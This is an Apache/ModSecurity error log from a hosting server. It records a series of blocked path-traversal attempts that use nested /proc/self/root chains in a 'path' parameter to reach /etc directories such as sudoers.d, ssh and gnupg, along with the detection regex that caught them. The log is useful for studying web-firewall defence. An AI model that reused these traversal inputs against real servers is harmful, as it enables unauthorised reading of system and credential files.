[Wed Mar 18 08:39:36.763173 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:54622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO-Na6ubjKNq_cu4aCYwAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:40.823041 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:54630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO_AkwaGbbGflqUZD65AAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:42.486938 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.243.128:54136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO_kzinOy1jxa1j4f9pwAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:50.063023 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:54140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPBuw_le52K8_3pV3KjgAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:54.137877 2026] [mime_magic:error] [pid 31803:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:50639] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:40:15.239233 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:37710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPH-oXxyEfFpUF8f9YxwAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:40:19.232010 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:51494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPItY0UrI5A3LftIyLBwAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:40:27.690145 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:46826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPK_u8EFLIOrSqIpvvZwAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:40:36.912541 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.243.128:60506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPMymAPhZkrhU8w4lXuQAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:40:48.051100 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:60510] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPQOw_le52K8_3pV3KygAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:40:49.367044 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:35460] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPQeoXxyEfFpUF8f9Y4QAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:40:50.730472 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:41310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPQuoXxyEfFpUF8f9Y5gAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:40:54.566964 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:41312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPRgkwaGbbGflqUZD7MwAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:40:55.904940 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:41318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPRwkwaGbbGflqUZD7NgAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:00.604050 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.128:41330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPTNY0UrI5A3LftIyLIAAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:41:06.087101 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:49350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPT-yqAr6etmhZHNqoQQAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:13.115074 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.243.128:50066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPWCmAPhZkrhU8w4lX1wAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:41:25.871089 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:45076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPZdY0UrI5A3LftIyLTgAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:27.143161 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:42126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPZ_u8EFLIOrSqIpvvlQAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:28.459644 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:42130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPaOoXxyEfFpUF8f9ZBwAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:31.787540 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.243.128:42298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPaymAPhZkrhU8w4lX4wAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:32.819917 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:48906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPbNY0UrI5A3LftIyLWgAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:33.122493 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.243.128:42310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 